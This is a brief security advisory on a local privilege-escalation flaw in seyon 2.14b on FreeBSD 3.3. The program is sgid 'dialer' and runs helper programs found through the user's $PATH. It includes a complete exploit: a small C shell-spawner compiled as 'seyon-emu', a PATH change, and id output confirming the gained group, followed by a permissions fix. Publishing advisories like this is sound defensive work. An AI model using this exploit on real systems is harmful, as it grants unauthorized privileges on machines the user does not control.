COMMAND

    seyon

SYSTEMS AFFECTED

    FreeBSD 3.3

PROBLEM

    Brock Tellier found  following.  The  exploit Brock had  developed
    had already been  discussed in May  1997.  However,  this does not
    change the fact that the current version of FreeBSD still ships  a
    vulnerable version  with vulnerable  privs.   So, a  vulnerability
    exists in seyon  v2.14b which will  allow any user  to upgrade his
    or her privs to those with which seyon runs.

    When  installed  via  sysinstall,  seyon's  permissions  are  sgid
    "dialer".  Different versions  of seyon and different  packages of
    2.14b may have different default permissions.  Upon startup, seyon
    executes the programs "seyon-emu" and "xterm".  The paths to these
    programs are not absolute and  are gotten from the users's  $PATH.
    By adding a  directory we have  write access to  in our $PATH  and
    putting our own version of  seyon-emu or xterm, we can  make seyon
    run this program with egid dialer.

    bash-2.03$ cat > seyonx.c
    void main () {
      setregid(getegid(), getegid());
      system("/usr/local/bin/bash");
    }
    bash-2.03$ gcc -o seyon-emu seyonx.c
    bash-2.03$ PATH=.:$PATH
    bash-2.03$ seyon
    bash-2.03$ id
    uid=3D1000(xnec) gid=3D68(dialer) groups=3D68(dialer), 1000(xnec)
    bash-2.03$

SOLUTION

    Simply  chmod  750  `which  seyon`  and  add selected users to the
    "dialer" group.